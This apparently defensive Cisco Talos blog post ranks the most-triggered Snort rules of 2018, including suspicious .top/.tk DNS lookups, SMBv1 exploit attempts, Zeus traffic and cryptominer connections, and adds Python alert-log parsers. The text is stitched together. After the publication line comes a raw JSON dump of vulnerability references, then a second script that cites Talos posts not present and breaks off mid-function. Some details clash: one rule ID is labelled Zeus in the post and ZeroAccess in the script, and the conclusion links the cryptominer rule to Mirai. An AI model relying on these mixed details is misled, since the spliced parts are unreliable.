_This blog post was authored by Benny Ketelslegers of Cisco Talos_
The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics.
But these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings from investigating the most frequently triggered SNORTⓇ rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware.
### Top 5 Rules
Snort rules trigger on network behavior ranging from attempts to probe networked systems and attempts at exploiting systems to known malicious command and control traffic. Each rule detects specific network activity, and each rule has a unique identifier. This identifier is made up of three parts: the Generator ID (GID), the rule ID (SID) and the revision number. The GID identifies which part of Snort generated the event. For example, "1" indicates that the event was generated by the text rules subsystem. The SID uniquely identifies the rule itself; you can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule.
Snort rules are classified into different classes based on the type of activity detected, with the most commonly reported class type being "policy-violation", followed by "trojan-activity" and "attempted-admin". Some less frequently reported class types, such as "attempted-user" and "web-application-attack", are particularly interesting in the context of detecting malicious inbound and outbound network traffic.
Cisco Meraki-managed devices protect clients' networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order.
#### No. 5: 1:43687:2 "suspicious .top dns query"
The .top top-level domain extension is a generic top-level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). A domain under this TLD can be bought for as little as 1 USD, which is why it is very popular with cybercriminals for their malware and phishing campaigns.
This signature triggers on DNS lookups for .top domains. Such a lookup is not necessarily malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated to find the cause, especially if a single device is responsible for a large proportion of these triggers.
#### No. 4: 1:41978:5 "Microsoft Windows SMB remote code execution attempt"
In May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot of scanning for, or attempts to exploit, this vulnerability in 2018. This shows the importance of network defenses and of patch management programs that patch as often as possible.
Organizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts.
#### No. 3: 1:39867:4 "Suspicious .tk dns query"
The .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows domains to be registered without payment, which makes the .tk top-level domain one of the most prolific in terms of the number of domain names registered. However, this free registration also leads to .tk domains frequently being abused by attackers.
This rule triggers on DNS lookups for .tk domains. Such a lookup is not necessarily malicious in nature, but it can be a useful indicator of suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated to find the cause, especially if a single device is responsible for a large proportion of these triggers.
Other, similar rules detecting DNS lookups to rarely used top-level domains such as .bit, .pw and .top also made it into our list of the top 20 most triggered rules.
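The two points above, the GID:SID:REV structure of a rule identifier and the advice to check whether a single device accounts for most of the .top/.tk DNS query triggers, can be put into practice with a small alert-log tally. The following is an added example and not Talos' or Snort's own code: it assumes alerts written in Snort's "fast" alert format, and the sample lines are constructed (the SIDs are the ones named in this post, the hosts, timestamps and classification strings are made up).

```python
"""Tally Snort fast-format alerts by rule ID and by source host.

Added example, not Talos' or Snort's code. Assumes the Snort "fast" alert
format; the SAMPLE_ALERTS below are constructed for illustration.
"""
import re
from collections import Counter

# One fast-format alert per line, e.g.
#   01/24-09:00:01.000000  [**] [1:43687:2] suspicious .top dns query [**]
#   [Classification: ...] [Priority: 2] {UDP} 10.0.0.5:51234 -> 10.0.0.1:53
# The bracketed triple is GID:SID:REV as described in the post.
ALERT_RE = re.compile(
    r"\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
)

# Constructed sample log; hosts, times and classifications are made up.
SAMPLE_ALERTS = [
    "01/24-09:00:01.000000  [**] [1:43687:2] suspicious .top dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.5:51234 -> 10.0.0.1:53",
    "01/24-09:00:02.000000  [**] [1:43687:2] suspicious .top dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.5:51235 -> 10.0.0.1:53",
    "01/24-09:00:03.000000  [**] [1:43687:2] suspicious .top dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.5:51236 -> 10.0.0.1:53",
    "01/24-09:00:04.000000  [**] [1:43687:2] suspicious .top dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.5:51237 -> 10.0.0.1:53",
    "01/24-09:00:05.000000  [**] [1:43687:2] suspicious .top dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.7:51238 -> 10.0.0.1:53",
    "01/24-09:00:06.000000  [**] [1:39867:4] Suspicious .tk dns query [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.0.0.9:51239 -> 10.0.0.1:53",
    "01/24-09:00:07.000000  [**] [1:41978:5] OS-WINDOWS Microsoft Windows SMB remote code execution attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.10:44444 -> 10.0.0.20:445",
    "not an alert line",
]


def parse_alert(line):
    """Return a dict with gid/sid/rev (ints), msg, proto, src, dst, ports; None if not an alert."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    for key in ("gid", "sid", "rev"):
        d[key] = int(d[key])
    return d


def top_rules(lines, n=5):
    """Count alerts per (gid, sid). The revision is ignored on purpose, so a rule
    that was updated mid-year still counts as one rule."""
    counts = Counter()
    for line in lines:
        alert = parse_alert(line)
        if alert:
            counts[(alert["gid"], alert["sid"])] += 1
    return counts.most_common(n)


def dominant_sources(lines, sid, threshold=0.5):
    """For one SID, return (host, share) for hosts responsible for more than
    `threshold` of that rule's alerts: the 'single device' case the post says to investigate."""
    per_host = Counter()
    for line in lines:
        alert = parse_alert(line)
        if alert and alert["sid"] == sid:
            per_host[alert["src"]] += 1
    total = sum(per_host.values())
    if total == 0:
        return []
    return [(host, n / total) for host, n in per_host.most_common() if n / total > threshold]


if __name__ == "__main__":
    for (gid, sid), n in top_rules(SAMPLE_ALERTS):
        print(f"{gid}:{sid}\t{n}")
    for host, share in dominant_sources(SAMPLE_ALERTS, 43687):
        print(f"SID 43687: {host} accounts for {share:.0%} of triggers")
```

Counting by (GID, SID) rather than the full triple is deliberate: the revision changes whenever Talos updates a rule, and a per-rule trend line should survive that. The threshold of 50 percent is an assumed starting point; what counts as "a large proportion" depends on how many clients the sensor sees.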
#### No. 2: 1:35030:1 & 1:23493:6 "Win.Trojan.Zeus variant outbound connection"
Historically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide.
In the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM).
This vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by the local security firm ISSP that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign.
Ever since the source code of Zeus leaked in 2011, we have seen various variants appear, such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>), which poisoned Google Search results in order to spread.
#### No. 1: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" & 1:45549:4 "PUA-OTHER XMRig cryptocurrency mining pool connection attempt"
Over the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat cryptocurrency mining threats, and this rule, deployed in early 2018, proved to be number one, showing the magnitude of the attacks it detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two rules, combined, are the most frequently triggered Snort rule of 2018.
Cryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization.
For an overview of all related Snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>).
![Figure: cryptocurrency miner outbound connection attempt](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)
### INBOUND and OUTBOUND
Network traffic can cross an IDS from the external to the internal interface (inbound) or from the internal to the external interface (outbound). Depending on the architecture of your environment, traffic can also avoid being filtered by a firewall or inspected by an IPS/IDS device altogether; this will generally be your local/internal traffic on the same Layer 2 segment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors.
Outbound rules were triggered during 2018 much more frequently than internal ones, which in turn were more frequent than inbound, with ratios of approximately 6.9 to 1. The profile of the alerts is different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detections of outgoing traffic caused by malware-infected endpoints.
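Splitting alerts into inbound, outbound and internal as described above is a matter of comparing each alert's source and destination against the sensor's internal address space. The following is an added example, not Talos' or Meraki's code: it assumes the internal address space (Snort's HOME_NET, a configuration value this post does not give) is 10.0.0.0/8 plus 192.168.0.0/16, and the alert records, including their class types, are constructed rather than taken from real sensor data.

```python
"""Classify Snort alerts by direction relative to HOME_NET and profile
class types per direction.

Added example, not Talos' or Meraki's code. HOME_NET and SAMPLE_RECORDS are
assumptions/constructed data, not values from the post.
"""
import ipaddress
from collections import Counter, defaultdict

# Assumed internal address space; in Snort this is the HOME_NET variable.
HOME_NET = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

# Constructed records, shaped like the fields a SIEM would extract from each alert.
# SIDs are those named in the post; addresses and class types are made up.
SAMPLE_RECORDS = [
    {"sid": 46237, "classtype": "policy-violation", "src": "10.0.0.5", "dst": "198.51.100.7"},
    {"sid": 46237, "classtype": "policy-violation", "src": "10.0.0.5", "dst": "198.51.100.7"},
    {"sid": 45549, "classtype": "policy-violation", "src": "10.0.0.8", "dst": "198.51.100.9"},
    {"sid": 35030, "classtype": "trojan-activity", "src": "192.168.1.6", "dst": "203.0.113.44"},
    {"sid": 41978, "classtype": "attempted-admin", "src": "10.0.0.21", "dst": "10.0.0.22"},
    {"sid": 41978, "classtype": "attempted-admin", "src": "10.0.0.21", "dst": "10.0.0.23"},
    {"sid": 41818, "classtype": "web-application-attack", "src": "203.0.113.10", "dst": "10.0.0.80"},
]


def is_home(addr):
    """True if the address falls inside any HOME_NET prefix."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in HOME_NET)


def direction(src, dst):
    """inbound: external -> internal; outbound: internal -> external;
    internal: both ends inside HOME_NET (the traffic a perimeter firewall never sees);
    external: neither end is ours, which usually means HOME_NET is misconfigured."""
    s, d = is_home(src), is_home(dst)
    if s and d:
        return "internal"
    if s:
        return "outbound"
    if d:
        return "inbound"
    return "external"


def direction_counts(records):
    """How many alerts fired in each direction."""
    return Counter(direction(r["src"], r["dst"]) for r in records)


def ratio(counts, a, b):
    """Ratio of direction a to direction b, or None when b never occurred."""
    return counts[a] / counts[b] if counts[b] else None


def profile(records):
    """Per direction, which class types dominate. Inbound alerts are expected to
    skew to server-side attack classes and outbound alerts to infected-endpoint classes."""
    out = defaultdict(Counter)
    for r in records:
        out[direction(r["src"], r["dst"])][r["classtype"]] += 1
    return out


if __name__ == "__main__":
    counts = direction_counts(SAMPLE_RECORDS)
    print(dict(counts), "outbound:inbound =", ratio(counts, "outbound", "inbound"))
    for dirn, classes in profile(SAMPLE_RECORDS).items():
        print(dirn, classes.most_common(2))
```

The "external" bucket is worth keeping even though a correctly placed sensor should never fill it: alerts landing there are the quickest sign that HOME_NET does not match the networks the sensor actually watches, which would silently skew every inbound/outbound figure derived from it.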
Looking at these data sets in more detail gives us the following:
![Figure: inbound signature types](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)
While trojan activity was the rule type we saw the most of in 2018, making up 42.5 percent of all alerts, for inbound traffic we can now see "Server-Apache" taking the lead, followed by "OS-Windows" as a close second.
The "Server-Apache" class type covers Apache-related attacks, which in this case consisted mainly of 1:41818 and 1:41819, detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts.
"OS-Windows" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010).
The "Browser-plugins" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser (for example, ActiveX). Most activity for 2018 seems to consist of SID 1:8068, which, among others, is linked to the "Microsoft Outlook Security Feature Bypass Vulnerability" (CVE-2017-11774).
![Figure: outbound signature types](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)
![Figure: outbound signature types](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)
For outbound connections, we observed a large shift toward the "PUA-Other" class, which is mainly cryptocurrency miner outbound connection attempts. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block cryptomining in an enterprise using Cisco Security Products, have a look at our [whitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018.
The most frequently triggered rules within the "Malware-CNC" rule class are the Zeus trojan activity rules discussed above.
### Conclusion
Snort rules detect potentially malicious network activity. Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack or has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. Such detections can indicate when an organization should be in a heightened state of awareness about the activity occurring within its environment and more suspicious of the security alerts being generated.
As the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.
Our most commonly triggered rule in 2018, 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt", highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices, no matter how small, are protected.
Security teams need to understand their network architectures and the significance of rules triggering in their environment. For a full understanding of the meaning of triggered detections, it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.
At Talos, we are proud to maintain a set of open-source Snort rules and to support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well as through the release of additional open-source tools and the detailing of attacks on our blog.
You can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure to see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).
_Published: 2019-02-06 (modified 2019-02-12)_
"THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:BF27EB1E464BD713B35779742C991C59", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:141C894C9A7CCB3BB2E580A6C8292E37", "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638", "UB:CVE-2017-9805"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-28445", "1337DAY-ID-28454"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:112992", "VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2019-0832"]}, {"type": "cisa", "idList": ["CISA:C0680147E070CCC4182A654B22694B78"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:42627"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K84144321"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "fortinet", "idList": ["FG-IR-17-205"]}, {"type": "github", "idList": ["GHSA-GG9M-FJ3V-R58C", "GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kaspersky", "idList": ["KLA11113"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11774"]}, {"type": "mskb", "idList": ["KB4011196"]}, {"type": "mssecure", "idList": ["MSSECURE:23C760CCBA6BF2ED8D8132921A32C2A3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201789104", "MYHACK58:62201789593"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", 
"OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310811922", "OPENVAS:1361412562310812024", "OPENVAS:1361412562310812028"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2017"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:144034", "PACKETSTORM:144050"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2017-9805"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:96420", "SSV:96659"]}, {"type": "symantec", "idList": ["SMNTC-101098"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D985A5A21B218B47A518D6D4AB858393", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", 
"THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:141C894C9A7CCB3BB2E580A6C8292E37", "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-9805"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-28445"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11774", "epss": "0.967100000", "percentile": "0.993780000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}, {"cve": "CVE-2017-9805", "epss": "0.975610000", "percentile": "0.999940000", "modified": "2023-03-14"}], "vulnersScore": -0.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1683995972, "epss": 1678876529}, "_internal": {"score_hash": "a6b5c2fc2d4720872ca2f04dbbde3b89"}}
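The two Talos posts embedded in the records that follow rank Snort rules by how often they trigger (each identified by its GID:SID:rev triple), split the alerts into inbound, outbound and internal traffic, and note that a noisy beacon such as the ZeroAccess super-node check-in makes the infected host easy to pinpoint from alert volume alone. The script below is an added example for this page, not code from Talos or from the Snort project: it parses Snort's alert_fast output format and produces those three views. The internal address range is an assumption, and the sample alerts are constructed: the rule IDs and most message texts are the ones the posts name, while the message and revision used for 1:41818 and every timestamp, address and port are invented.

```python
"""Parse Snort alert_fast lines, then rank rules, classify direction and find the
noisiest source host. Added example for this page, not Talos or Snort project code.
Assumes Snort's alert_fast output layout and IPv4 addresses."""
import ipaddress
import re
from collections import Counter

# Assumption (not stated on the page): the range the sensor treats as "internal".
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample alerts. Rule IDs and most message texts are those the embedded
# posts name; the message/revision for 1:41818 and all timestamps, addresses and
# ports are invented for the example.
SAMPLE_ALERTS = """\
02/14-03:12:41.118201  [**] [1:40522:3] Unix.Trojan.Mirai variant post compromise fingerprinting [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 203.0.113.77:38114 -> 10.0.0.9:23
02/14-03:12:42.004519  [**] [1:40522:3] Unix.Trojan.Mirai variant post compromise fingerprinting [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 198.51.100.5:51020 -> 10.0.0.12:23
02/14-03:13:05.771003  [**] [1:23493:6] Win.Trojan.ZeroAccess outbound connection [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 10.0.1.23:16464 -> 198.51.100.40:16464
02/14-03:13:06.771112  [**] [1:23493:6] Win.Trojan.ZeroAccess outbound connection [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 10.0.1.23:16464 -> 198.51.100.40:16464
02/14-03:14:10.220900  [**] [1:41083:1] suspicious .bit dns query [**] [Classification: A Network Trojan was detected] [Priority: 1] {UDP} 10.0.1.23:53412 -> 10.0.0.2:53
02/14-03:15:33.009114  [**] [1:39867:3] Suspicious .tk dns query [**] [Classification: Misc activity] [Priority: 3] {UDP} 10.0.2.7:49001 -> 10.0.0.2:53
02/14-03:16:02.555000  [**] [1:42079:1] Win.Trojan.Jenxcus outbound connection attempt with unique User-Agent [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.7:50213 -> 203.0.113.200:80
02/14-03:17:48.313377  [**] [1:41818:1] Apache Struts remote code execution attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.77:44110 -> 10.0.0.5:8080
02/14-03:20:00.000001  [**] [1:40522:3] Unix.Trojan.Mirai variant post compromise fingerprinting [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 203.0.113.90:40001 -> 10.0.0.31:2323
"""

# alert_fast layout:
#   <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: <text>] [Priority: <n>] {<proto>} <src>[:port] -> <dst>[:port]
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[A-Za-z0-9]+)\}\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?\s*$"
)


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def direction(src: str, dst: str) -> str:
    """Classify a flow the way the post does: inbound, outbound or internal."""
    s, d = is_internal(src), is_internal(dst)
    if s and d:
        return "internal"
    if s:
        return "outbound"
    if d:
        return "inbound"
    return "external"  # neither end is ours: usually a sensor placement problem


def parse_alert(line: str):
    """Return a dict for one alert_fast line, or None if the line does not match."""
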